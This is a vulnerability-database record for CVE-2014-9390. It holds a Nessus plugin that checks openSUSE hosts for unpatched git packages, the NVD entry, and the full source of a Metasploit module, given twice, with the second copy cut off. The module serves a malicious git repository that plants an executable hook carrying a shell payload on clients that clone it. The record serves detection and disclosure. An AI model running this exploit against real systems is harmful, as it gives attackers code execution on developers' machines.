ID OPENSUSE-2015-80.NASL Type nessus Reporter This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2015-01-29T00:00:00
Description
This update fixes the following security issue:
CVE-2014-9390: arbitrary command execution vulnerability
on case-insensitive file systems (bnc#910756)
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2015-80.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");
# Description block: when Nessus loads the plugin with `description` set, only
# the metadata below is registered and the script exits (exit(0) at the end
# of the block) before the package check body further down ever runs.
if (description)
{
# Plugin identity, revision and CVE coverage (a single CVE: CVE-2014-9390).
script_id(81064);
script_version("1.7");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
script_cve_id("CVE-2014-9390");
script_name(english:"openSUSE Security Update : git (openSUSE-SU-2015:0159-1)");
script_summary(english:"Check for the openSUSE-2015-80 patch");
# Report text. The description is the advisory wording and is a runtime
# string; keep it byte-identical to the upstream advisory.
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This update fixes the following security issue :
- CVE-2014-9390: arbitrary command execution vulnerability
on case-insensitive file system ( bnc#910756)"
);
# References: the openSUSE bug (bnc#910756) and the update announcement.
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=910756"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2015-01/msg00083.html"
);
script_set_attribute(attribute:"solution", value:"Update the affected git packages.");
# Severity: CVSS v2 and v3 base vectors (network, no auth, no user
# interaction). Used by the scanner to rank the finding.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
# Exploit metadata: a public Metasploit module exists for this CVE, so hosts
# flagged by this plugin that clone from untrusted remotes deserve
# remediation priority.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
# Local (credentialed) check; one CPE per git sub-package plus the two
# openSUSE releases the check body recognises.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-arch");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-core");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-core-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-cvs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-daemon");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-daemon-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-debugsource");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-email");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-gui");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-remote-helpers");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-svn");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-svn-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:git-web");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gitk");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:13.2");
# NOTE(review): vuln_publication_date (2020/02/12) postdates the patch date;
# it appears to track the NVD record's publication date rather than the
# December 2014 disclosure, so do not read it as the start of the exposure
# window.
script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/12");
script_set_attribute(attribute:"patch_publication_date", value:"2015/01/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/29");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
# ACT_GATHER_INFO: the check body only reads KB entries; it sends nothing to
# the target itself. The four required keys are exactly the ones the body
# reads (local_checks_enabled, SuSE/release, SuSE/rpm-list, cpu), presumably
# populated by the ssh_get_info.nasl dependency.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Preflight. Each failed precondition is reported through audit(); the checks
# are kept in this order because the first failing one decides the audit
# reason shown to the user.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# Only openSUSE 13.1 / 13.2 are covered; an absent release string or an
# enterprise (SLED/SLES) release is rejected as "not openSUSE".
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)")
{
  audit(AUDIT_OS_NOT, "openSUSE");
}
if (release !~ "^(SUSE13\.1|SUSE13\.2)$")
{
  audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "13.1 / 13.2", release);
}

# The package checks below need the RPM inventory collected over SSH.
if (!get_kb_item("Host/SuSE/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# The package references below only exist for x86 builds, so any other
# architecture is audited out rather than silently reported clean.
ourarch = get_kb_item("Host/cpu");
if (!ourarch)
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if (ourarch !~ "^(i586|i686|x86_64)$")
{
  audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
}
# Package version checks. rpm_check() (rpm.inc, not shown here) returns true
# when the installed package is older than the reference and records the
# detail later fetched by rpm_report_get(); `flag` counts the hits. The
# calls are issued in the same order as the advisory lists the packages.
flag = 0;

# openSUSE 13.1: every git sub-package was rebuilt as 1.8.4.5-3.8.4.
suse131_pkgs = make_list(
  "git", "git-arch", "git-core", "git-core-debuginfo", "git-cvs",
  "git-daemon", "git-daemon-debuginfo", "git-debugsource", "git-email",
  "git-gui", "git-remote-helpers", "git-svn", "git-svn-debuginfo",
  "git-web", "gitk"
);
foreach pkg (suse131_pkgs)
{
  if (rpm_check(release:"SUSE13.1", reference:pkg + "-1.8.4.5-3.8.4")) flag++;
}

# openSUSE 13.2: same sub-packages minus git-remote-helpers, fixed in 2.1.4-9.7.
suse132_pkgs = make_list(
  "git", "git-arch", "git-core", "git-core-debuginfo", "git-cvs",
  "git-daemon", "git-daemon-debuginfo", "git-debugsource", "git-email",
  "git-gui", "git-svn", "git-svn-debuginfo", "git-web", "gitk"
);
foreach pkg (suse132_pkgs)
{
  if (rpm_check(release:"SUSE13.2", reference:pkg + "-2.1.4-9.7")) flag++;
}

# NOTE(review): the x86_64-only rows use a lower release (2.1.4-9.6) than the
# arch-independent rows above (9.7); presumably the advisory shipped two
# builds — verify against the openSUSE-SU-2015:0159-1 announcement linked in
# see_also before treating a 9.6 hit as a distinct finding.
foreach pkg (suse132_pkgs)
{
  if (rpm_check(release:"SUSE13.2", cpu:"x86_64", reference:pkg + "-2.1.4-9.6")) flag++;
}
# Reporting. No hit: explain why via audit() — either every probed package
# was already at or above the fixed version, or none of the git packages is
# installed at all. At least one hit: raise a hole on port 0 (local check),
# attaching the per-package detail from rpm_report_get() only when the scan's
# report_verbosity asks for it.
if (!flag)
{
  probed = pkg_tests_get();
  if (probed) audit(AUDIT_PACKAGE_NOT_AFFECTED, probed);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "git / git-arch / git-core / git-core-debuginfo / git-cvs / etc");
}
else
{
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:rpm_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}
{"cve": [{"lastseen": "2020-12-09T19:58:29", "description": "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T02:15:00", "title": "CVE-2014-9390", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9390"], "modified": "2020-09-09T18:15:00", "cpe": ["cpe:/a:apple:xcode:6.1.1", "cpe:/a:libgit2:libgit2:-", "cpe:/a:apple:xcode:6.2", "cpe:/a:eclipse:jgit:-", "cpe:/a:eclipse:egit:-"], "id": "CVE-2014-9390", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:xcode:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:egit:-:*:*:*:*:*:*:*", "cpe:2.3:a:libgit2:libgit2:-:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jgit:-:*:*:*:*:*:*:*", "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*", "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-07T23:04:28", "description": "This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows \"short names\" (MS-DOS-compatible 8.3 format) are supported. 
Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work.\n", "published": "2015-01-01T19:03:17", "type": "metasploit", "title": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n 
clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => '2014-12-18',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial 
support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content.\n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. 
There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc.\n #\n # This vulnerability allows a specially crafted file to bypass Git's\n # blacklist and overwrite the sensitive .git/hooks/ files which can allow\n # arbitrary code execution if a vulnerable Git client can be convinced to\n # interact with a malicious Git repository.\n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' 
+ variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. 
Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, 
@repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? 
If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_client_command_exec.rb"}, {"lastseen": "2020-11-28T21:10:39", "description": "This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. 
The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows \"short names\" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work.\n", "published": "2015-01-01T19:03:17", "type": "metasploit", "title": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial 
clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => '2014-12-18',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n 
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content.\n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. 
